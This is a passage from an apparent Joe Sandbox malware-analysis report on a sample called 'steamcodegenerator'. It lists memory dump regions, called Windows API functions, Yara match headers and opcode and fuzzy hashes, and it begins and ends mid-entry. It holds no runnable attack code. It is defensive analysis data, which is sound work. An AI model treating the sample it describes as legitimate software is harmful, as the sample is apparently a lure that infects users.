                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                          • String ID: %$+
                                                                                                                          • API String ID: 3668304517-2626897407
                                                                                                                          • Opcode ID: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                                                                          • Instruction ID: adc18bb4ef2b60d55f5a5ae0a588a37d1b849da52e96738d5151ab6695d4e9f9
                                                                                                                          • Opcode Fuzzy Hash: 269d37533fdaf201db9261dc3333217303a5f80c2e6368c3b5d31c85d833f6b3
                                                                                                                          • Instruction Fuzzy Hash: 02120522B18E858AFB25DBA4D8403FDA371AF55B98FA44131EF4D17A89DF3CD4498720
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2933794660-0
                                                                                                                          • Opcode ID: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                                                                          • Instruction ID: 6ec8e1d1c3bc35d72a898fbe56e02dcb81d5aa32444396dbf2dc66feb6c6ec9e
                                                                                                                          • Opcode Fuzzy Hash: cabce6d9e3ae1a9f9b79acc04b8ec2d00ffbc707921c0ad921e752880e15d35e
                                                                                                                          • Instruction Fuzzy Hash: 2A114F22B14F068AEB009FA0EC452B873A4F719768F940D31DB6D42B54DF38D1588350
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                          • API String ID: 3215553584-2761157908
                                                                                                                          • Opcode ID: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                                                                          • Instruction ID: c077a36d12dab1c1494944a6728b6dfb0e036c3dcff8d5445b0f5b30a576ce53
                                                                                                                          • Opcode Fuzzy Hash: b2729346d47deeb60f377ee9dc525e25925e1ea60ab6d02c77dc29d9f41ed541
                                                                                                                          • Instruction Fuzzy Hash: 44713A63F18B4246E7699FE4C8427F9A291EB807B4FA18634DA5D46AC4DF3CF5488E10
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1502251526-0
                                                                                                                          • Opcode ID: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                                                                          • Instruction ID: 70a7b6e738fb1f70c2e1fb22e4f5f1f3340842550a1a60116ba5e0040d84078a
                                                                                                                          • Opcode Fuzzy Hash: a3a34dc7f104a5757306e0e4006adbba08ef9a00a3e13a0073f806107d450ba3
                                                                                                                          • Instruction Fuzzy Hash: 07C12772B18A9687DB24DFD9E4446AAF792F784B94F929134DB4E43744DB3CE804CB40
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1791019856-0
                                                                                                                          • Opcode ID: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                                                                          • Instruction ID: bbc5cdd1c645ebec286f7846f5e6ae4acd84a003adb2031215410f24505b4db5
                                                                                                                          • Opcode Fuzzy Hash: 4fcf00f24d458d487f226e0140c30a747feae87a0b699733a31c15bd732d9dab
                                                                                                                          • Instruction Fuzzy Hash: F961C432B08A4286EB38BF95D9422F9B3A1FB54B60FA18135C79D43691DF3CE459CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID:
• String ID: -$e+000$gfff
• API String ID: 0-2620144452
APIs
Strings
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
APIs
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-0
APIs
Similarity
• API ID: ErrorLastValue$InfoLocale
• String ID:
• API String ID: 673564084-0
APIs
  • Part of subcall function 00007FF71C06A298: GetLastError.KERNEL32 ref: 00007FF71C06A2A7
  • Part of subcall function 00007FF71C06A298: FlsGetValue.KERNEL32 ref: 00007FF71C06A2BC
  • Part of subcall function 00007FF71C06A298: SetLastError.KERNEL32 ref: 00007FF71C06A347
• EnumSystemLocalesW.KERNEL32(?,?,?,00007FF71C074627,?,00000000,00000092,?,?,00000000,?,00007FF71C066B25), ref: 00007FF71C073ED6
Similarity
• API ID: ErrorLast$EnumLocalesSystemValue
• String ID:
• API String ID: 3029459697-0
APIs
  • Part of subcall function 00007FF71C06A298: GetLastError.KERNEL32 ref: 00007FF71C06A2A7
  • Part of subcall function 00007FF71C06A298: FlsGetValue.KERNEL32 ref: 00007FF71C06A2BC
  • Part of subcall function 00007FF71C06A298: SetLastError.KERNEL32 ref: 00007FF71C06A347
• GetLocaleInfoW.KERNEL32(?,?,?,00007FF71C07419A), ref: 00007FF71C074427
Similarity
• API ID: ErrorLast$InfoLocaleValue
• String ID:
• API String ID: 3796814847-0
APIs
  • Part of subcall function 00007FF71C06A298: GetLastError.KERNEL32 ref: 00007FF71C06A2A7
  • Part of subcall function 00007FF71C06A298: FlsGetValue.KERNEL32 ref: 00007FF71C06A2BC
  • Part of subcall function 00007FF71C06A298: SetLastError.KERNEL32 ref: 00007FF71C06A347
• EnumSystemLocalesW.KERNEL32(?,?,?,00007FF71C0745E3,?,00000000,00000092,?,?,00000000,?,00007FF71C066B25), ref: 00007FF71C073F86
Similarity
• API ID: ErrorLast$EnumLocalesSystemValue
• String ID:
• API String ID: 3029459697-0
APIs
• EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF71C06B7C7,?,?,?,?,?,?,?,?,00000000,00007FF71C073488), ref: 00007FF71C06B3C7
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32 ref: 00007FF71C06F0AD
                                                                                                                            • Part of subcall function 00007FF71C068A7C: HeapAlloc.KERNEL32(?,?,00000000,00007FF71C06A472,?,?,00008ABED36B4165,00007FF71C064851,?,?,?,?,00007FF71C06F7CA,?,?,00000000), ref: 00007FF71C068AD1
                                                                                                                            • Part of subcall function 00007FF71C068AF4: HeapFree.KERNEL32(?,?,00007FF71C067CF3,00007FF71C0728CA,?,?,?,00007FF71C072C47,?,?,00000000,00007FF71C073185,?,?,?,00007FF71C0730B7), ref: 00007FF71C068B0A
                                                                                                                            • Part of subcall function 00007FF71C068AF4: GetLastError.KERNEL32(?,?,00007FF71C067CF3,00007FF71C0728CA,?,?,?,00007FF71C072C47,?,?,00000000,00007FF71C073185,?,?,?,00007FF71C0730B7), ref: 00007FF71C068B14
                                                                                                                            • Part of subcall function 00007FF71C07641C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF71C07644F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 916656526-0
                                                                                                                          • Opcode ID: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                                                                          • Instruction ID: 337f75a3307fe78eae65bea66001b5c523bcf6b2943861741cfc3f336bb797b6
                                                                                                                          • Opcode Fuzzy Hash: 3010b15ffcd90dc3c5e11d2ab062aefea6c4980bf83277aeeb3b0d4140d9f5ca
                                                                                                                          • Instruction Fuzzy Hash: 7541C421B09B5642F660AEA6AC117FEF2906F45BE0FE44539DE4D4B785EF3CE4088620
                                                                                                                          APIs

Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
• Instruction ID: 8977439996027e0991757d0f92b66574c4f923cb00694b152dbb742a2a910f24
• Opcode Fuzzy Hash: 6192be7a75bab5d09286e1907ab1535ba3ae8895899e3a88e776268eb0ac952a
• Instruction Fuzzy Hash: 92B09224E07F46C2EA48BB916C8726462A4BF48720FE98038C29C51320EF6C24A98720

Memory Dump Source
• Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
• Instruction ID: 3a44af4c75a296bca1b85304dce611d8b1ed9ff1a1a8e989952074b63e7e7e4f
• Opcode Fuzzy Hash: 958daa2a7498e9c4c0bde3b5edfdcbb4db2551368d5f8b4b3812ff5c91696324
• Instruction Fuzzy Hash: E6E17571618B498BEB6CDF28C8497AEB7E5FB58701F11422DE84AC3251DF30E955CB81

Memory Dump Source
• Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
• Instruction ID: 5b5c7f2667a065f2a97ae7e37440f951cd14fadbfd7634b18976053cc08ddfce
• Opcode Fuzzy Hash: a66aa8eccb36b3c863fa0cf2326f118ce4658279e53cce5a51b176019e00911a
• Instruction Fuzzy Hash: 96D14071518B488FDB59DF28C889AEAB7E6FF94310F14462DE88AC7155DF30E981CB41

Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
• String ID:
• API String ID: 4023145424-0
• Opcode ID: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
• Instruction ID: 5cf2d0bb5e99a9985fbea191f3f7cd5ac0cea715fafe17db7b91b2751fddf054
• Opcode Fuzzy Hash: 892cc1368fc14e84ac0355cad1cb2199747d5964f06703ea1faf111155d2dc5e
• Instruction Fuzzy Hash: 5AC1B362B08AA285EB60AFA1DC103FAB7A4FB947A8FE04035DE4D47695DF38D549C710

Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
• Instruction ID: 6521bdb3f74e1cdea6e45563a17823d88c61b753314cbb8674d0eae167d69836
• Opcode Fuzzy Hash: 544cec4f1fce81e20c5dc2a100fe106bde7a3ffc9f232f4ad8d78bd217c1061b
• Instruction Fuzzy Hash: F2C1E722B08E6686EB28DFE588002BDB3A0EB05B68FB44235CE4D477D5CF39D459D760

Memory Dump Source
• Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
• Instruction ID: 043777bd918bdd5d9ffdf27ec606d8811cfae87eebad80b1d45582ea0b49d935
• Opcode Fuzzy Hash: 75c19430ad9555f9ce9cd9ae4dcbb2ad4329e1d612567e8c7bcd07260438a972
• Instruction Fuzzy Hash: C4A11F71508A4C8FDB55EF28C889BDAB7E9FB68315F10466EE44AC7161EB30E644CB81

Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: ErrorLast$Value_invalid_parameter_noinfo
• String ID:
• API String ID: 1500699246-0
• Opcode ID: e2ffca55289955cad0152be945083cfc4f4c9dbb8a5636975514020bfa88af06
• Instruction ID: 5759ec8fbf7116bbce89c3ee7f837b270881695473d123aa0a7dad1c90fd399a
• Opcode Fuzzy Hash: e2ffca55289955cad0152be945083cfc4f4c9dbb8a5636975514020bfa88af06
• Instruction Fuzzy Hash: 66B10C62A08B4642F768BFA1D8136F9B391FB40FA4FA04135DA99436C5DF3CE559C360

Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: beb85e8a86863ea0d2a3640763483ded5549c817e49d63ce28143ff9a2fe482d
• Instruction ID: 23103056b26722e292fbe5083e0d9690f803e2897b366dac28a8e1cfe3d63e64
• Opcode Fuzzy Hash: beb85e8a86863ea0d2a3640763483ded5549c817e49d63ce28143ff9a2fe482d
• Instruction Fuzzy Hash: BF81B272B04E2282EB64AEA5D8813BD7360FB44BA4FA04636EF5E57785CF38D1498310

Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dd78b8a88bf6096c80a61e6aa1672cbc30d8af44914a7a383a5bb521698ea26c
• Instruction ID: 1fc84e4c0110251118fc2171bb04c3d0675e478dd11370258f1a209ad940c64e
• Opcode Fuzzy Hash: dd78b8a88bf6096c80a61e6aa1672cbc30d8af44914a7a383a5bb521698ea26c
• Instruction Fuzzy Hash: 8B51D572B0CAD149E664AF5998403FAF691FB457A4FA44235DA9E43F99DB3CE0048B20

Memory Dump Source
• Source File: 00000000.00000002.3398854857.0000020C74771000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000020C74771000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c74771000_steamcodegenerator.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
• Instruction ID: 2dcbde4afc440015ca1b494394d7f02b3c6d10a89deb488578193015c65ea515
• Opcode Fuzzy Hash: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
• Instruction Fuzzy Hash: 9E418D317145058BEB0CCF2DD895A65B3E6FB99304F58C7BDE54BCB297DA319802CA44
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                          • Instruction ID: 151b1ca9802bcb952961fcfcbb286d46df8c17440cd0808d531221cb2ab24f2c
                                                                                                                          • Opcode Fuzzy Hash: ac8362b94cbf271fd23ce0d6965fdbbec26e6817efc2dd1af2fcdc0b4ee58872
                                                                                                                          • Instruction Fuzzy Hash: 61518032B58E6186F724DF69C8402A8B7B0EB45F6CF748131CA8D1B795CB3AE846C754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                                                                          • Instruction ID: 0c86ab750a096dba397c510b7d68c3e45b704121e42a942b85c9f7c9cc95b0e0
                                                                                                                          • Opcode Fuzzy Hash: 45278502b4de115ed76afef2690a2838d0b28876f14c66dd069eb4612fa83dd3
                                                                                                                          • Instruction Fuzzy Hash: 9A519436B58A7286E764DF69C4402ACB7B4EB44B6CFB44131CE4C17798CB3AE84AC754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                          • Instruction ID: 224ba80af14bf1c745db84a541c3482d96419601289a02affe4f78a1aae528cf
                                                                                                                          • Opcode Fuzzy Hash: c9c3f90e6787dc6e65e60abd648d80575bcfa0207306300bab00d1ff848a11e7
                                                                                                                          • Instruction Fuzzy Hash: A151BF72B58A6186E724DF68C4402A9B7B0EB44B6CFB48131CE8D07795CF3AEC46C754
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 485612231-0
                                                                                                                          • Opcode ID: a2c328ef171a7afa6c06a3296587a9b3e14f038aec87a28e036cef878b6331d9
                                                                                                                          • Instruction ID: cd92af0f151b4680565abe009adf300b5119910e25e585cd13d4bb23b0a6f952
                                                                                                                          • Opcode Fuzzy Hash: a2c328ef171a7afa6c06a3296587a9b3e14f038aec87a28e036cef878b6331d9
                                                                                                                          • Instruction Fuzzy Hash: 0741E462714E5581EF48DFAADD151A9B3A1FB48FE4BA99032DE0D97B58DF3CD0458300
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
